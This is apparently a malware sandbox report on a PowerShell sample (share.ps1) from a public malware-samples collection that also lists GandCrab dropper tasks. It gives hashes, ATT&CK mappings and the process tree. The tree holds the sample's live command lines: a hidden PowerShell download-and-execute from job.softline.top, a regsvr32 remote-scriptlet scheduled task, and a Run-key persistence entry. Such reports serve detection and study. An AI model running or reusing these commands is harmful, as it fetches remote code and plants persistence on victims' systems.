Overview
overview
10Static
static
10malware-sa...er.jpg
windows7-x64
3malware-sa...er.jpg
windows10-2004-x64
4malware-sa...6.docx
windows7-x64
7malware-sa...6.docx
windows10-2004-x64
1malware-sa...it.ps1
windows7-x64
10malware-sa...it.ps1
windows10-2004-x64
3malware-sa...ad.dll
windows7-x64
3malware-sa...ad.dll
windows10-2004-x64
3malware-sa...re.ps1
windows7-x64
10malware-sa...re.ps1
windows10-2004-x64
10malware-sa...7f.doc
windows7-x64
10malware-sa...7f.doc
windows10-2004-x64
10malware-sa...7f.vbs
windows7-x64
1malware-sa...7f.vbs
windows10-2004-x64
1malware-sa...fb9.js
windows7-x64
8malware-sa...fb9.js
windows10-2004-x64
8malware-sa...b72.js
windows7-x64
8malware-sa...b72.js
windows10-2004-x64
8malware-sa...8ca.js
windows7-x64
8malware-sa...8ca.js
windows10-2004-x64
8malware-sa...bf0.js
windows7-x64
8malware-sa...bf0.js
windows10-2004-x64
8malware-sa...a6e.js
windows7-x64
8malware-sa...a6e.js
windows10-2004-x64
8malware-sa...b41.js
windows7-x64
8malware-sa...b41.js
windows10-2004-x64
8malware-sa...8dd.js
windows7-x64
8malware-sa...8dd.js
windows10-2004-x64
8malware-sa...621.js
windows7-x64
8malware-sa...621.js
windows10-2004-x64
8malware-sa...982.js
windows7-x64
8malware-sa...982.js
windows10-2004-x64
8Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-02-2025 20:39
Behavioral task
behavioral1
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/banner.jpg
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/banner.jpg
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/d347e095369aba294f674331054df8469b12d5e3260deb168827142d862f88d6.docx
Resource
win7-20250207-en
Behavioral task
behavioral4
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/d347e095369aba294f674331054df8469b12d5e3260deb168827142d862f88d6.docx
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/loadinglit.ps1
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/loadinglit.ps1
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/payload.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/payload.dll
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/share.ps1
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
malware-samples-master/2018-04-Common-Malware-Carrier/share.ps1
Resource
win10v2004-20250217-en
Behavioral task
behavioral11
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.doc
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.doc
Resource
win10v2004-20250217-en
Behavioral task
behavioral13
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.vbs
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
malware-samples-master/2018-04-GandCrab-Swarm/99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral15
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/026b02380e79af4b1b0282c2473828c6fb9.js
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/026b02380e79af4b1b0282c2473828c6fb9.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral17
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0638e4dfe95bdae94a751404e4c91adbb72.js
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0638e4dfe95bdae94a751404e4c91adbb72.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral19
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0cba53c366aeb34bd6dfb1ed1f9b9b7d8ca.js
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/0cba53c366aeb34bd6dfb1ed1f9b9b7d8ca.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral21
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/20812b4ffe8a022d8eef35476095e385bf0.js
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/20812b4ffe8a022d8eef35476095e385bf0.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral23
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/21d43c6b03d0e9827111572c9cbfa499a6e.js
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/21d43c6b03d0e9827111572c9cbfa499a6e.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral25
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/233516df74662f82d61ae8025b6371ecb41.js
Resource
win7-20241023-en
Behavioral task
behavioral26
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/233516df74662f82d61ae8025b6371ecb41.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral27
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/45e1a8582716c51212a45df8f26298cb8dd.js
Resource
win7-20240729-en
Behavioral task
behavioral28
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/45e1a8582716c51212a45df8f26298cb8dd.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral29
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/56f0260ad67596e08a5017b0c62f0610621.js
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/56f0260ad67596e08a5017b0c62f0610621.js
Resource
win10v2004-20250217-en
Behavioral task
behavioral31
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/636897d92ddd9ba0e127366a3d4c816a982.js
Resource
win7-20241010-en
Behavioral task
behavioral32
Sample
malware-samples-master/2018-04-GandCrab-Swarm/dropper-javascript/636897d92ddd9ba0e127366a3d4c816a982.js
Resource
win10v2004-20250217-en
General
-
Target
malware-samples-master/2018-04-Common-Malware-Carrier/share.ps1
-
Size
1KB
-
MD5
2c9f13f79f1dd88b9b5b1ab3a6e2374b
-
SHA1
fc7f2e1ad64070be4d44b583155b2ec2af18cb03
-
SHA256
acec4a38d7b5ef95a2e33dce721c5693e7da966b751ec45bfa3e39b5181c6b19
-
SHA512
f01fa0a0549a9a26a41dc9ab4f22052d92a699bb7bbd505710034878335ff3e42c624635691e7089fd12d38eaae0613413350f08905a56078b86852842e564f6
Malware Config
Extracted
http://job.softline.top/loadinglit.gif
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2064 powershell.exe 1560 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\windows tasks check = "c:\\windows\\tasks\\SCHEDLGU.exe" reg.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created \??\c:\windows\tasks\SCHEDLGU.exe powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2544 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1560 powershell.exe 2064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1560 wrote to memory of 2544 1560 powershell.exe 30 PID 1560 wrote to memory of 2544 1560 powershell.exe 30 PID 1560 wrote to memory of 2544 1560 powershell.exe 30 PID 1560 wrote to memory of 2536 1560 powershell.exe 32 PID 1560 wrote to memory of 2536 1560 powershell.exe 32 PID 1560 wrote to memory of 2536 1560 powershell.exe 32 PID 1560 wrote to memory of 2064 1560 powershell.exe 33 PID 1560 wrote to memory of 2064 1560 powershell.exe 33 PID 1560 wrote to memory of 2064 1560 powershell.exe 33 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malware-samples-master\2018-04-Common-Malware-Carrier\share.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "windows update" /tr "regsvr32 /u /s /i:http://job.softline.top/ad2.jpg scrobj.dll" /sc daily /st 12:00 /F2⤵
- Scheduled Task/Job: Scheduled Task
PID:2544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "windows tasks check" /t REG_SZ /d "c:\windows\tasks\SCHEDLGU.exe" /f2⤵
- Adds Run key to start application
PID:2536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/loadinglit.gif')2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56247994f9423bac9f4046eaa82a1d695
SHA18e926ff5f03af97aba2306bd2be2a9f7f513d730
SHA256e7e91ca6ea3782fd847dea36580bab2beea5959969f4abdfa14679530623c9bf
SHA51221bd789f58ed4dce20ac5350f801948984f9236e581cde441e33abd92c3734964b3442b3e8336254416c086c67a8db9521ca9bd2301b39da40c8cfa0ed82f419